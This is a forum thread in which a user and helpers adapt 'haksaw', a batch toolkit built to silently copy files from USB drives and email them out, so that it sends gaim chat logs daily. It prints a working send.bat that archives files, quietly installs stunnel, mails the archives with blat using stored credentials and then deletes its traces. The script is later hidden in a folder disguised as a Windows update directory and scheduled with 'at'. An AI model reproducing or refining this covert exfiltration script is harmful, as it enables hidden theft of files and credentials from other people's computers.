Can someone help me code/ lead me in the right direction

Mv3rck

I'm looking to somehow get my laptop to automatically send me gaim log files to my desktop everyso often, maybe once a day. I figured I'd probably use blat and some sort of batch file but I have no idea how to get it to run at certain intervals. I'm new to coding and trying to learn but not really sure where to look.

Ok so I downloaded haksaw and edited the emails and everything (working on the scheduling command while I'm doing this so that it runs everynight around 4am, thanks SomeoneElse) now I'm wondering if there's anyway to change it so that when I run haksaw it will copy the folder I'm looking for (the gaim logs) instead of the usb files. Or is there an easier way to accomplish this...

Thanks

Ok so I downloaded haksaw and edited the emails and everything (working on the scheduling command while I'm doing this so that it runs everynight around 4am, thanks SomeoneElse) now I'm wondering if there's anyway to change it so that when I run haksaw it will copy the folder I'm looking for (the gaim logs) instead of the usb files. Or is there an easier way to accomplish this...

Thanks

I think this should work but not seeing the code it self i could be wrong

COPY "C:Program Files(PATH TO GAIM LOG FILES)*.txt" "C:(PATH TO TEMP FOLDER FOR COMPRESSION)" /Y

now as long as you add that before the line in that compresses the files them mails them in send.bat you should be good if this confused you (it kinda confused me) let me know and past the contents of send.bat here and i'll set it up for you

well right now I just have the stock haksaw send.bat... it's this (minus me email info of course)

:: Configure Email Options

SET emailfrom=

SET emailto=

SET password=

:: Archive documents in 1MB chunks

rar a goodies.rar .docs -v1024k -vn

stunnel-4.11.exe -install -quiet

net start stunnel

GOTO sendfiles

:cleanup

:: Stop stunnel

rem taskkill /f /im stunnel-4.11.exe (??)

net stop stunnel

stunnel-4.11.exe -uninstall -quiet

:: Delete documents

rmdir /s /q docs

:: Delete archive

del /q /f goodies*.*

GOTO end

:sendfiles

for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

:end

I'm starting to confuse myself with all this so any help is great, thanks

:: Configure Email Options

SET emailfrom=

SET emailto=

SET password=

COPY "C:Program FilesPATH TO GAIM LOGFILES*" ".docs" /y 

:: Archive documents in 1MB chunks

rar a goodies.rar .docs -v1024k -vn

stunnel-4.11.exe -install -quiet

net start stunnel

GOTO sendfiles

:cleanup

:: Stop stunnel

rem taskkill /f /im stunnel-4.11.exe (??)

net stop stunnel

stunnel-4.11.exe -uninstall -quiet

:: Delete documents

rmdir /s /q docs

:: Delete archive

del /q /f goodies*.*

GOTO end

:sendfiles

for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

:end

I don't have gaim on this system so i dont know where the log files are but edit "PATH TO GAIM LOGFILES" and fix the e-mail options and you should be good test it out before you trust it and let me know how to works for you

Absolutely Amazing... I tested the send.bat file and it works flawlessly. Now I'm going to try to create a .cmd file to copy the files from my usb to the drive and schedual it to run every night. May take a little bit.

thanks!

Ok so I have everything working except for the scheduling part and I think I'm just missing something...

start %systemroot%$NtUninstallkb931337$send.bat

at 04:32 /every:M,T,W,Th,F,S,Su send.bat

Right now I have the go.cmd copying to the systemroot folder, it then is supposed to run the above code to send me the first file and to schedule the next files. When it gets to this part it will email me the first file, and it will schedule but for some reason one the time elapses for the schedule it won't send. I'm thinking I have the command portion of the AT wrong but I've tried everything I can think of ("full addresssend.bat", send, send.bat,) I'm sure I'm missing something but I can't figure it out for the life of me.